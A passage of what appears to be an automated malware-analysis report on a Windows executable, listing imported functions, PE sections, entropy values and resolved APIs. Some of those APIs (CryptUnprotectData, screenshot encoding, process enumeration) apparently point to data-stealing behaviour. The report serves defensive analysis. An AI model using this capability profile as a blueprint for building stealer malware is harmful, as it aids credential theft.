  1754. "address": "0x46f520"
  1755. },
  1756. {
  1757. "name": "SetClassLongA",
  1758. "address": "0x46f524"
  1759. },
  1760. {
  1761. "name": "SetCapture",
  1762. "address": "0x46f528"
  1763. },
  1764. {
  1765. "name": "SetActiveWindow",
  1766. "address": "0x46f52c"
  1767. },
  1768. {
  1769. "name": "SendMessageA",
  1770. "address": "0x46f530"
  1771. },
  1772. {
  1773. "name": "ScrollWindow",
  1774. "address": "0x46f534"
  1775. },
  1776. {
  1777. "name": "ScreenToClient",
  1778. "address": "0x46f538"
  1779. },
  1780. {
  1781. "name": "RemovePropA",
  1782. "address": "0x46f53c"
  1783. },
  1784. {
  1785. "name": "RemoveMenu",
  1786. "address": "0x46f540"
  1787. },
  1788. {
  1789. "name": "ReleaseDC",
  1790. "address": "0x46f544"
  1791. },
  1792. {
  1793. "name": "ReleaseCapture",
  1794. "address": "0x46f548"
  1795. },
  1796. {
  1797. "name": "RegisterWindowMessageA",
  1798. "address": "0x46f54c"
  1799. },
  1800. {
  1801. "name": "RegisterClipboardFormatA",
  1802. "address": "0x46f550"
  1803. },
  1804. {
  1805. "name": "RegisterClassA",
  1806. "address": "0x46f554"
  1807. },
  1808. {
  1809. "name": "RedrawWindow",
  1810. "address": "0x46f558"
  1811. },
  1812. {
  1813. "name": "PtInRect",
  1814. "address": "0x46f55c"
  1815. },
  1816. {
  1817. "name": "PostQuitMessage",
  1818. "address": "0x46f560"
  1819. },
  1820. {
  1821. "name": "PostMessageA",
  1822. "address": "0x46f564"
  1823. },
  1824. {
  1825. "name": "PeekMessageA",
  1826. "address": "0x46f568"
  1827. },
  1828. {
  1829. "name": "OpenClipboard",
  1830. "address": "0x46f56c"
  1831. },
  1832. {
  1833. "name": "OffsetRect",
  1834. "address": "0x46f570"
  1835. },
  1836. {
  1837. "name": "OemToCharA",
  1838. "address": "0x46f574"
  1839. },
  1840. {
  1841. "name": "MessageBoxA",
  1842. "address": "0x46f578"
  1843. },
  1844. {
  1845. "name": "MessageBeep",
  1846. "address": "0x46f57c"
  1847. },
  1848. {
  1849. "name": "MapWindowPoints",
  1850. "address": "0x46f580"
  1851. },
  1852. {
  1853. "name": "MapVirtualKeyA",
  1854. "address": "0x46f584"
  1855. },
  1856. {
  1857. "name": "LoadStringA",
  1858. "address": "0x46f588"
  1859. },
  1860. {
  1861. "name": "LoadKeyboardLayoutA",
  1862. "address": "0x46f58c"
  1863. },
  1864. {
  1865. "name": "LoadIconA",
  1866. "address": "0x46f590"
  1867. },
  1868. {
  1869. "name": "LoadCursorA",
  1870. "address": "0x46f594"
  1871. },
  1872. {
  1873. "name": "LoadBitmapA",
  1874. "address": "0x46f598"
  1875. },
  1876. {
  1877. "name": "KillTimer",
  1878. "address": "0x46f59c"
  1879. },
  1880. {
  1881. "name": "IsZoomed",
  1882. "address": "0x46f5a0"
  1883. },
  1884. {
  1885. "name": "IsWindowVisible",
  1886. "address": "0x46f5a4"
  1887. },
  1888. {
  1889. "name": "IsWindowEnabled",
  1890. "address": "0x46f5a8"
  1891. },
  1892. {
  1893. "name": "IsWindow",
  1894. "address": "0x46f5ac"
  1895. },
  1896. {
  1897. "name": "IsRectEmpty",
  1898. "address": "0x46f5b0"
  1899. },
  1900. {
  1901. "name": "IsIconic",
  1902. "address": "0x46f5b4"
  1903. },
  1904. {
  1905. "name": "IsDialogMessageA",
  1906. "address": "0x46f5b8"
  1907. },
  1908. {
  1909. "name": "IsChild",
  1910. "address": "0x46f5bc"
  1911. },
  1912. {
  1913. "name": "IsCharAlphaNumericA",
  1914. "address": "0x46f5c0"
  1915. },
  1916. {
  1917. "name": "IsCharAlphaA",
  1918. "address": "0x46f5c4"
  1919. },
  1920. {
  1921. "name": "InvalidateRect",
  1922. "address": "0x46f5c8"
  1923. },
  1924. {
  1925. "name": "IntersectRect",
  1926. "address": "0x46f5cc"
  1927. },
  1928. {
  1929. "name": "InsertMenuItemA",
  1930. "address": "0x46f5d0"
  1931. },
  1932. {
  1933. "name": "InsertMenuA",
  1934. "address": "0x46f5d4"
  1935. },
  1936. {
  1937. "name": "InflateRect",
  1938. "address": "0x46f5d8"
  1939. },
  1940. {
  1941. "name": "GetWindowThreadProcessId",
  1942. "address": "0x46f5dc"
  1943. },
  1944. {
  1945. "name": "GetWindowTextA",
  1946. "address": "0x46f5e0"
  1947. },
  1948. {
  1949. "name": "GetWindowRect",
  1950. "address": "0x46f5e4"
  1951. },
  1952. {
  1953. "name": "GetWindowPlacement",
  1954. "address": "0x46f5e8"
  1955. },
  1956. {
  1957. "name": "GetWindowLongA",
  1958. "address": "0x46f5ec"
  1959. },
  1960. {
  1961. "name": "GetWindowDC",
  1962. "address": "0x46f5f0"
  1963. },
  1964. {
  1965. "name": "GetTopWindow",
  1966. "address": "0x46f5f4"
  1967. },
  1968. {
  1969. "name": "GetSystemMetrics",
  1970. "address": "0x46f5f8"
  1971. },
  1972. {
  1973. "name": "GetSystemMenu",
  1974. "address": "0x46f5fc"
  1975. },
  1976. {
  1977. "name": "GetSysColorBrush",
  1978. "address": "0x46f600"
  1979. },
  1980. {
  1981. "name": "GetSysColor",
  1982. "address": "0x46f604"
  1983. },
  1984. {
  1985. "name": "GetSubMenu",
  1986. "address": "0x46f608"
  1987. },
  1988. {
  1989. "name": "GetScrollRange",
  1990. "address": "0x46f60c"
  1991. },
  1992. {
  1993. "name": "GetScrollPos",
  1994. "address": "0x46f610"
  1995. },
  1996. {
  1997. "name": "GetScrollInfo",
  1998. "address": "0x46f614"
  1999. },
  2000. {
  2001. "name": "GetPropA",
  2002. "address": "0x46f618"
  2003. },
  2004. {
  2005. "name": "GetParent",
  2006. "address": "0x46f61c"
  2007. },
  2008. {
  2009. "name": "GetWindow",
  2010. "address": "0x46f620"
  2011. },
  2012. {
  2013. "name": "GetMessageTime",
  2014. "address": "0x46f624"
  2015. },
  2016. {
  2017. "name": "GetMenuStringA",
  2018. "address": "0x46f628"
  2019. },
  2020. {
  2021. "name": "GetMenuState",
  2022. "address": "0x46f62c"
  2023. },
  2024. {
  2025. "name": "GetMenuItemInfoA",
  2026. "address": "0x46f630"
  2027. },
  2028. {
  2029. "name": "GetMenuItemID",
  2030. "address": "0x46f634"
  2031. },
  2032. {
  2033. "name": "GetMenuItemCount",
  2034. "address": "0x46f638"
  2035. },
  2036. {
  2037. "name": "GetMenu",
  2038. "address": "0x46f63c"
  2039. },
  2040. {
  2041. "name": "GetLastActivePopup",
  2042. "address": "0x46f640"
  2043. },
  2044. {
  2045. "name": "GetKeyboardState",
  2046. "address": "0x46f644"
  2047. },
  2048. {
  2049. "name": "GetKeyboardLayoutList",
  2050. "address": "0x46f648"
  2051. },
  2052. {
  2053. "name": "GetKeyboardLayout",
  2054. "address": "0x46f64c"
  2055. },
  2056. {
  2057. "name": "GetKeyState",
  2058. "address": "0x46f650"
  2059. },
  2060. {
  2061. "name": "GetKeyNameTextA",
  2062. "address": "0x46f654"
  2063. },
  2064. {
  2065. "name": "GetIconInfo",
  2066. "address": "0x46f658"
  2067. },
  2068. {
  2069. "name": "GetForegroundWindow",
  2070. "address": "0x46f65c"
  2071. },
  2072. {
  2073. "name": "GetFocus",
  2074. "address": "0x46f660"
  2075. },
  2076. {
  2077. "name": "GetDesktopWindow",
  2078. "address": "0x46f664"
  2079. },
  2080. {
  2081. "name": "GetDCEx",
  2082. "address": "0x46f668"
  2083. },
  2084. {
  2085. "name": "GetDC",
  2086. "address": "0x46f66c"
  2087. },
  2088. {
  2089. "name": "GetCursorPos",
  2090. "address": "0x46f670"
  2091. },
  2092. {
  2093. "name": "GetCursor",
  2094. "address": "0x46f674"
  2095. },
  2096. {
  2097. "name": "GetClipboardData",
  2098. "address": "0x46f678"
  2099. },
  2100. {
  2101. "name": "GetClientRect",
  2102. "address": "0x46f67c"
  2103. },
  2104. {
  2105. "name": "GetClassNameA",
  2106. "address": "0x46f680"
  2107. },
  2108. {
  2109. "name": "GetClassInfoA",
  2110. "address": "0x46f684"
  2111. },
  2112. {
  2113. "name": "GetCapture",
  2114. "address": "0x46f688"
  2115. },
  2116. {
  2117. "name": "GetActiveWindow",
  2118. "address": "0x46f68c"
  2119. },
  2120. {
  2121. "name": "FrameRect",
  2122. "address": "0x46f690"
  2123. },
  2124. {
  2125. "name": "FindWindowA",
  2126. "address": "0x46f694"
  2127. },
  2128. {
  2129. "name": "FillRect",
  2130. "address": "0x46f698"
  2131. },
  2132. {
  2133. "name": "EqualRect",
  2134. "address": "0x46f69c"
  2135. },
  2136. {
  2137. "name": "EnumWindows",
  2138. "address": "0x46f6a0"
  2139. },
  2140. {
  2141. "name": "EnumThreadWindows",
  2142. "address": "0x46f6a4"
  2143. },
  2144. {
  2145. "name": "EnumClipboardFormats",
  2146. "address": "0x46f6a8"
  2147. },
  2148. {
  2149. "name": "EndPaint",
  2150. "address": "0x46f6ac"
  2151. },
  2152. {
  2153. "name": "EndDeferWindowPos",
  2154. "address": "0x46f6b0"
  2155. },
  2156. {
  2157. "name": "EnableWindow",
  2158. "address": "0x46f6b4"
  2159. },
  2160. {
  2161. "name": "EnableScrollBar",
  2162. "address": "0x46f6b8"
  2163. },
  2164. {
  2165. "name": "EnableMenuItem",
  2166. "address": "0x46f6bc"
  2167. },
  2168. {
  2169. "name": "EmptyClipboard",
  2170. "address": "0x46f6c0"
  2171. },
  2172. {
  2173. "name": "DrawTextA",
  2174. "address": "0x46f6c4"
  2175. },
  2176. {
  2177. "name": "DrawMenuBar",
  2178. "address": "0x46f6c8"
  2179. },
  2180. {
  2181. "name": "DrawIconEx",
  2182. "address": "0x46f6cc"
  2183. },
  2184. {
  2185. "name": "DrawIcon",
  2186. "address": "0x46f6d0"
  2187. },
  2188. {
  2189. "name": "DrawFrameControl",
  2190. "address": "0x46f6d4"
  2191. },
  2192. {
  2193. "name": "DrawEdge",
  2194. "address": "0x46f6d8"
  2195. },
  2196. {
  2197. "name": "DispatchMessageA",
  2198. "address": "0x46f6dc"
  2199. },
  2200. {
  2201. "name": "DestroyWindow",
  2202. "address": "0x46f6e0"
  2203. },
  2204. {
  2205. "name": "DestroyMenu",
  2206. "address": "0x46f6e4"
  2207. },
  2208. {
  2209. "name": "DestroyIcon",
  2210. "address": "0x46f6e8"
  2211. },
  2212. {
  2213. "name": "DestroyCursor",
  2214. "address": "0x46f6ec"
  2215. },
  2216. {
  2217. "name": "DeleteMenu",
  2218. "address": "0x46f6f0"
  2219. },
  2220. {
  2221. "name": "DeferWindowPos",
  2222. "address": "0x46f6f4"
  2223. },
  2224. {
  2225. "name": "DefWindowProcA",
  2226. "address": "0x46f6f8"
  2227. },
  2228. {
  2229. "name": "DefMDIChildProcA",
  2230. "address": "0x46f6fc"
  2231. },
  2232. {
  2233. "name": "DefFrameProcA",
  2234. "address": "0x46f700"
  2235. },
  2236. {
  2237. "name": "CreatePopupMenu",
  2238. "address": "0x46f704"
  2239. },
  2240. {
  2241. "name": "CreateMenu",
  2242. "address": "0x46f708"
  2243. },
  2244. {
  2245. "name": "CreateIcon",
  2246. "address": "0x46f70c"
  2247. },
  2248. {
  2249. "name": "CloseClipboard",
  2250. "address": "0x46f710"
  2251. },
  2252. {
  2253. "name": "ClientToScreen",
  2254. "address": "0x46f714"
  2255. },
  2256. {
  2257. "name": "CheckMenuItem",
  2258. "address": "0x46f718"
  2259. },
  2260. {
  2261. "name": "CallWindowProcA",
  2262. "address": "0x46f71c"
  2263. },
  2264. {
  2265. "name": "CallNextHookEx",
  2266. "address": "0x46f720"
  2267. },
  2268. {
  2269. "name": "BeginPaint",
  2270. "address": "0x46f724"
  2271. },
  2272. {
  2273. "name": "BeginDeferWindowPos",
  2274. "address": "0x46f728"
  2275. },
  2276. {
  2277. "name": "CharNextA",
  2278. "address": "0x46f72c"
  2279. },
  2280. {
  2281. "name": "CharLowerBuffA",
  2282. "address": "0x46f730"
  2283. },
  2284. {
  2285. "name": "CharLowerA",
  2286. "address": "0x46f734"
  2287. },
  2288. {
  2289. "name": "CharUpperBuffA",
  2290. "address": "0x46f738"
  2291. },
  2292. {
  2293. "name": "CharToOemA",
  2294. "address": "0x46f73c"
  2295. },
  2296. {
  2297. "name": "AdjustWindowRectEx",
  2298. "address": "0x46f740"
  2299. },
  2300. {
  2301. "name": "ActivateKeyboardLayout",
  2302. "address": "0x46f744"
  2303. }
  2304. ],
  2305. "dll": "user32.dll"
  2306. },
  2307. {
  2308. "imports": [
  2309. {
  2310. "name": "Sleep",
  2311. "address": "0x46f74c"
  2312. }
  2313. ],
  2314. "dll": "kernel32.dll"
  2315. },
  2316. {
  2317. "imports": [
  2318. {
  2319. "name": "SafeArrayPtrOfIndex",
  2320. "address": "0x46f754"
  2321. },
  2322. {
  2323. "name": "SafeArrayGetUBound",
  2324. "address": "0x46f758"
  2325. },
  2326. {
  2327. "name": "SafeArrayGetLBound",
  2328. "address": "0x46f75c"
  2329. },
  2330. {
  2331. "name": "SafeArrayCreate",
  2332. "address": "0x46f760"
  2333. },
  2334. {
  2335. "name": "VariantChangeType",
  2336. "address": "0x46f764"
  2337. },
  2338. {
  2339. "name": "VariantCopy",
  2340. "address": "0x46f768"
  2341. },
  2342. {
  2343. "name": "VariantClear",
  2344. "address": "0x46f76c"
  2345. },
  2346. {
  2347. "name": "VariantInit",
  2348. "address": "0x46f770"
  2349. }
  2350. ],
  2351. "dll": "oleaut32.dll"
  2352. },
  2353. {
  2354. "imports": [
  2355. {
  2356. "name": "CreateStreamOnHGlobal",
  2357. "address": "0x46f778"
  2358. },
  2359. {
  2360. "name": "IsAccelerator",
  2361. "address": "0x46f77c"
  2362. },
  2363. {
  2364. "name": "OleDraw",
  2365. "address": "0x46f780"
  2366. },
  2367. {
  2368. "name": "OleSetMenuDescriptor",
  2369. "address": "0x46f784"
  2370. },
  2371. {
  2372. "name": "CoTaskMemFree",
  2373. "address": "0x46f788"
  2374. },
  2375. {
  2376. "name": "ProgIDFromCLSID",
  2377. "address": "0x46f78c"
  2378. },
  2379. {
  2380. "name": "StringFromCLSID",
  2381. "address": "0x46f790"
  2382. },
  2383. {
  2384. "name": "CoCreateInstance",
  2385. "address": "0x46f794"
  2386. },
  2387. {
  2388. "name": "CoGetClassObject",
  2389. "address": "0x46f798"
  2390. },
  2391. {
  2392. "name": "CoUninitialize",
  2393. "address": "0x46f79c"
  2394. },
  2395. {
  2396. "name": "CoInitialize",
  2397. "address": "0x46f7a0"
  2398. },
  2399. {
  2400. "name": "IsEqualGUID",
  2401. "address": "0x46f7a4"
  2402. }
  2403. ],
  2404. "dll": "ole32.dll"
  2405. },
  2406. {
  2407. "imports": [
  2408. {
  2409. "name": "GetErrorInfo",
  2410. "address": "0x46f7ac"
  2411. },
  2412. {
  2413. "name": "GetActiveObject",
  2414. "address": "0x46f7b0"
  2415. },
  2416. {
  2417. "name": "SysFreeString",
  2418. "address": "0x46f7b4"
  2419. }
  2420. ],
  2421. "dll": "oleaut32.dll"
  2422. },
  2423. {
  2424. "imports": [
  2425. {
  2426. "name": "ImageList_SetIconSize",
  2427. "address": "0x46f7bc"
  2428. },
  2429. {
  2430. "name": "ImageList_GetIconSize",
  2431. "address": "0x46f7c0"
  2432. },
  2433. {
  2434. "name": "ImageList_Write",
  2435. "address": "0x46f7c4"
  2436. },
  2437. {
  2438. "name": "ImageList_Read",
  2439. "address": "0x46f7c8"
  2440. },
  2441. {
  2442. "name": "ImageList_GetDragImage",
  2443. "address": "0x46f7cc"
  2444. },
  2445. {
  2446. "name": "ImageList_DragShowNolock",
  2447. "address": "0x46f7d0"
  2448. },
  2449. {
  2450. "name": "ImageList_SetDragCursorImage",
  2451. "address": "0x46f7d4"
  2452. },
  2453. {
  2454. "name": "ImageList_DragMove",
  2455. "address": "0x46f7d8"
  2456. },
  2457. {
  2458. "name": "ImageList_DragLeave",
  2459. "address": "0x46f7dc"
  2460. },
  2461. {
  2462. "name": "ImageList_DragEnter",
  2463. "address": "0x46f7e0"
  2464. },
  2465. {
  2466. "name": "ImageList_EndDrag",
  2467. "address": "0x46f7e4"
  2468. },
  2469. {
  2470. "name": "ImageList_BeginDrag",
  2471. "address": "0x46f7e8"
  2472. },
  2473. {
  2474. "name": "ImageList_Remove",
  2475. "address": "0x46f7ec"
  2476. },
  2477. {
  2478. "name": "ImageList_DrawEx",
  2479. "address": "0x46f7f0"
  2480. },
  2481. {
  2482. "name": "ImageList_Draw",
  2483. "address": "0x46f7f4"
  2484. },
  2485. {
  2486. "name": "ImageList_GetBkColor",
  2487. "address": "0x46f7f8"
  2488. },
  2489. {
  2490. "name": "ImageList_SetBkColor",
  2491. "address": "0x46f7fc"
  2492. },
  2493. {
  2494. "name": "ImageList_ReplaceIcon",
  2495. "address": "0x46f800"
  2496. },
  2497. {
  2498. "name": "ImageList_Add",
  2499. "address": "0x46f804"
  2500. },
  2501. {
  2502. "name": "ImageList_GetImageCount",
  2503. "address": "0x46f808"
  2504. },
  2505. {
  2506. "name": "ImageList_Destroy",
  2507. "address": "0x46f80c"
  2508. },
  2509. {
  2510. "name": "ImageList_Create",
  2511. "address": "0x46f810"
  2512. }
  2513. ],
  2514. "dll": "comctl32.dll"
  2515. },
  2516. {
  2517. "imports": [
  2518. {
  2519. "name": "OpenPrinterA",
  2520. "address": "0x46f818"
  2521. },
  2522. {
  2523. "name": "EnumPrintersA",
  2524. "address": "0x46f81c"
  2525. },
  2526. {
  2527. "name": "DocumentPropertiesA",
  2528. "address": "0x46f820"
  2529. },
  2530. {
  2531. "name": "ClosePrinter",
  2532. "address": "0x46f824"
  2533. }
  2534. ],
  2535. "dll": "winspool.drv"
  2536. },
  2537. {
  2538. "imports": [
  2539. {
  2540. "name": "PrintDlgA",
  2541. "address": "0x46f82c"
  2542. }
  2543. ],
  2544. "dll": "comdlg32.dll"
  2545. }
  2546. ],
  2547. "digital_signers": null,
  2548. "exported_dll_name": null,
  2549. "actual_checksum": "0x000a0c7b",
  2550. "overlay": null,
  2551. "imagebase": "0x00400000",
  2552. "reported_checksum": "0x00000000",
  2553. "icon_hash": null,
  2554. "entrypoint": "0x0046304c",
  2555. "timestamp": "1992-03-19 06:54:55",
  2556. "osversion": "4.0",
  2557. "sections": [
  2558. {
  2559. "name": "CODE",
  2560. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  2561. "virtual_address": "0x00001000",
  2562. "size_of_data": "0x00062200",
  2563. "entropy": "6.54",
  2564. "raw_address": "0x00000400",
  2565. "virtual_size": "0x00062094",
  2566. "characteristics_raw": "0x60000020"
  2567. },
  2568. {
  2569. "name": "DATA",
  2570. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2571. "virtual_address": "0x00064000",
  2572. "size_of_data": "0x00009600",
  2573. "entropy": "4.97",
  2574. "raw_address": "0x00062600",
  2575. "virtual_size": "0x00009528",
  2576. "characteristics_raw": "0xc0000040"
  2577. },
  2578. {
  2579. "name": "BSS",
  2580. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2581. "virtual_address": "0x0006e000",
  2582. "size_of_data": "0x00000000",
  2583. "entropy": "0.00",
  2584. "raw_address": "0x0006bc00",
  2585. "virtual_size": "0x00000d59",
  2586. "characteristics_raw": "0xc0000000"
  2587. },
  2588. {
  2589. "name": ".idata",
  2590. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2591. "virtual_address": "0x0006f000",
  2592. "size_of_data": "0x00002600",
  2593. "entropy": "5.01",
  2594. "raw_address": "0x0006bc00",
  2595. "virtual_size": "0x00002540",
  2596. "characteristics_raw": "0xc0000040"
  2597. },
  2598. {
  2599. "name": ".tls",
  2600. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2601. "virtual_address": "0x00072000",
  2602. "size_of_data": "0x00000000",
  2603. "entropy": "0.00",
  2604. "raw_address": "0x0006e200",
  2605. "virtual_size": "0x00000010",
  2606. "characteristics_raw": "0xc0000000"
  2607. },
  2608. {
  2609. "name": ".rdata",
  2610. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  2611. "virtual_address": "0x00073000",
  2612. "size_of_data": "0x00000200",
  2613. "entropy": "0.21",
  2614. "raw_address": "0x0006e200",
  2615. "virtual_size": "0x00000018",
  2616. "characteristics_raw": "0x50000040"
  2617. },
  2618. {
  2619. "name": ".reloc",
  2620. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  2621. "virtual_address": "0x00074000",
  2622. "size_of_data": "0x00007200",
  2623. "entropy": "6.67",
  2624. "raw_address": "0x0006e400",
  2625. "virtual_size": "0x00007108",
  2626. "characteristics_raw": "0x50000040"
  2627. },
  2628. {
  2629. "name": ".rsrc",
  2630. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  2631. "virtual_address": "0x0007c000",
  2632. "size_of_data": "0x00026400",
  2633. "entropy": "7.04",
  2634. "raw_address": "0x00075600",
  2635. "virtual_size": "0x000263d8",
  2636. "characteristics_raw": "0x50000040"
  2637. }
  2638. ],
  2639. "resources": [],
  2640. "dirents": [
  2641. {
  2642. "virtual_address": "0x00000000",
  2643. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2644. "size": "0x00000000"
  2645. },
  2646. {
  2647. "virtual_address": "0x0006f000",
  2648. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2649. "size": "0x00002540"
  2650. },
  2651. {
  2652. "virtual_address": "0x0007c000",
  2653. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2654. "size": "0x000263d8"
  2655. },
  2656. {
  2657. "virtual_address": "0x00000000",
  2658. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2659. "size": "0x00000000"
  2660. },
  2661. {
  2662. "virtual_address": "0x00000000",
  2663. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2664. "size": "0x00000000"
  2665. },
  2666. {
  2667. "virtual_address": "0x00074000",
  2668. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2669. "size": "0x00007108"
  2670. },
  2671. {
  2672. "virtual_address": "0x00000000",
  2673. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2674. "size": "0x00000000"
  2675. },
  2676. {
  2677. "virtual_address": "0x00000000",
  2678. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2679. "size": "0x00000000"
  2680. },
  2681. {
  2682. "virtual_address": "0x00000000",
  2683. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2684. "size": "0x00000000"
  2685. },
  2686. {
  2687. "virtual_address": "0x00073000",
  2688. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2689. "size": "0x00000018"
  2690. },
  2691. {
  2692. "virtual_address": "0x00000000",
  2693. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2694. "size": "0x00000000"
  2695. },
  2696. {
  2697. "virtual_address": "0x00000000",
  2698. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2699. "size": "0x00000000"
  2700. },
  2701. {
  2702. "virtual_address": "0x00000000",
  2703. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2704. "size": "0x00000000"
  2705. },
  2706. {
  2707. "virtual_address": "0x00000000",
  2708. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2709. "size": "0x00000000"
  2710. },
  2711. {
  2712. "virtual_address": "0x00000000",
  2713. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2714. "size": "0x00000000"
  2715. },
  2716. {
  2717. "virtual_address": "0x00000000",
  2718. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2719. "size": "0x00000000"
  2720. }
  2721. ],
  2722. "exports": [],
  2723. "guest_signers": {},
  2724. "imphash": "46116a2f8090728368dbf9ef96584273",
  2725. "icon_fuzzy": null,
  2726. "icon": null,
  2727. "pdbpath": null,
  2728. "imported_dll_count": 17,
  2729. "versioninfo": []
  2730. }
  2731. }
  2732.  
  2733. [*] Resolved APIs: [
  2734. "kernel32.dll.GetDiskFreeSpaceExA",
  2735. "oleaut32.dll.VariantChangeTypeEx",
  2736. "oleaut32.dll.VarNeg",
  2737. "oleaut32.dll.VarNot",
  2738. "oleaut32.dll.VarAdd",
  2739. "oleaut32.dll.VarSub",
  2740. "oleaut32.dll.VarMul",
  2741. "oleaut32.dll.VarDiv",
  2742. "oleaut32.dll.VarIdiv",
  2743. "oleaut32.dll.VarMod",
  2744. "oleaut32.dll.VarAnd",
  2745. "oleaut32.dll.VarOr",
  2746. "oleaut32.dll.VarXor",
  2747. "oleaut32.dll.VarCmp",
  2748. "oleaut32.dll.VarI4FromStr",
  2749. "oleaut32.dll.VarR4FromStr",
  2750. "oleaut32.dll.VarR8FromStr",
  2751. "oleaut32.dll.VarDateFromStr",
  2752. "oleaut32.dll.VarCyFromStr",
  2753. "oleaut32.dll.VarBoolFromStr",
  2754. "oleaut32.dll.VarBstrFromCy",
  2755. "oleaut32.dll.VarBstrFromDate",
  2756. "oleaut32.dll.VarBstrFromBool",
  2757. "user32.dll.GetMonitorInfoA",
  2758. "user32.dll.GetSystemMetrics",
  2759. "user32.dll.EnumDisplayMonitors",
  2760. "dwmapi.dll.DwmIsCompositionEnabled",
  2761. "gdi32.dll.GetLayout",
  2762. "gdi32.dll.GdiRealizationInfo",
  2763. "gdi32.dll.FontIsLinked",
  2764. "advapi32.dll.RegOpenKeyExW",
  2765. "advapi32.dll.RegQueryInfoKeyW",
  2766. "gdi32.dll.GetTextFaceAliasW",
  2767. "advapi32.dll.RegEnumValueW",
  2768. "advapi32.dll.RegCloseKey",
  2769. "advapi32.dll.RegQueryValueExW",
  2770. "gdi32.dll.GetFontAssocStatus",
  2771. "advapi32.dll.RegQueryValueExA",
  2772. "advapi32.dll.RegEnumKeyExW",
  2773. "gdi32.dll.GdiIsMetaPrintDC",
  2774. "user32.dll.AnimateWindow",
  2775. "comctl32.dll.InitializeFlatSB",
  2776. "comctl32.dll.UninitializeFlatSB",
  2777. "comctl32.dll.FlatSB_GetScrollProp",
  2778. "comctl32.dll.FlatSB_SetScrollProp",
  2779. "comctl32.dll.FlatSB_EnableScrollBar",
  2780. "comctl32.dll.FlatSB_ShowScrollBar",
  2781. "comctl32.dll.FlatSB_GetScrollRange",
  2782. "comctl32.dll.FlatSB_GetScrollInfo",
  2783. "comctl32.dll.FlatSB_GetScrollPos",
  2784. "comctl32.dll.FlatSB_SetScrollPos",
  2785. "comctl32.dll.FlatSB_SetScrollInfo",
  2786. "comctl32.dll.FlatSB_SetScrollRange",
  2787. "user32.dll.SetLayeredWindowAttributes",
  2788. "ole32.dll.CoCreateInstanceEx",
  2789. "ole32.dll.CoInitializeEx",
  2790. "ole32.dll.CoAddRefServerProcess",
  2791. "ole32.dll.CoReleaseServerProcess",
  2792. "ole32.dll.CoResumeClassObjects",
  2793. "ole32.dll.CoSuspendClassObjects",
  2794. "olepro32.dll.OleCreatePropertyFrame",
  2795. "olepro32.dll.OleCreateFontIndirect",
  2796. "olepro32.dll.OleCreatePictureIndirect",
  2797. "olepro32.dll.OleLoadPicture",
  2798. "crypt32.dll.CryptUnprotectData",
  2799. "crtdll.dll.wcscmp",
  2800. "gdiplus.dll.GdiplusStartup",
  2801. "gdiplus.dll.GdiplusShutdown",
  2802. "gdiplus.dll.GdipCreateBitmapFromHBITMAP",
  2803. "gdiplus.dll.GdipGetImageEncodersSize",
  2804. "gdiplus.dll.GdipGetImageEncoders",
  2805. "gdiplus.dll.GdipDisposeImage",
  2806. "gdiplus.dll.GdipSaveImageToStream",
  2807. "ole32.dll.CreateStreamOnHGlobal",
  2808. "ole32.dll.GetHGlobalFromStream",
  2809. "kernel32.dll.ExpandEnvironmentStringsW",
  2810. "kernel32.dll.GetComputerNameW",
  2811. "kernel32.dll.GlobalMemoryStatus",
  2812. "kernel32.dll.CreateFileW",
  2813. "kernel32.dll.GetFileSize",
  2814. "kernel32.dll.CloseHandle",
  2815. "kernel32.dll.ReadFile",
  2816. "kernel32.dll.GetFileAttributesW",
  2817. "kernel32.dll.CreateMutexA",
  2818. "kernel32.dll.ReleaseMutex",
  2819. "kernel32.dll.GetLastError",
  2820. "kernel32.dll.GetCurrentDirectoryW",
  2821. "kernel32.dll.SetEnvironmentVariableW",
  2822. "kernel32.dll.SetCurrentDirectoryW",
  2823. "kernel32.dll.FindFirstFileW",
  2824. "kernel32.dll.FindNextFileW",
  2825. "kernel32.dll.LocalFree",
  2826. "kernel32.dll.GetTickCount",
  2827. "kernel32.dll.CopyFileW",
  2828. "kernel32.dll.FindClose",
  2829. "kernel32.dll.GlobalMemoryStatusEx",
  2830. "kernel32.dll.CreateToolhelp32Snapshot",
  2831. "kernel32.dll.Process32FirstW",
  2832. "kernel32.dll.Process32NextW",
  2833. "kernel32.dll.GetModuleFileNameW",
  2834. "kernel32.dll.SetDllDirectoryW",
  2835. "kernel32.dll.GetLocaleInfoA",
  2836. "kernel32.dll.GetLocalTime",
  2837. "kernel32.dll.GetTimeZoneInformation",
  2838. "kernel32.dll.RemoveDirectoryW",
  2839. "kernel32.dll.DeleteFileW",
  2840. "kernel32.dll.GetLogicalDriveStringsA",
  2841. "kernel32.dll.GetDriveTypeA",
  2842. "kernel32.dll.CreateProcessW",
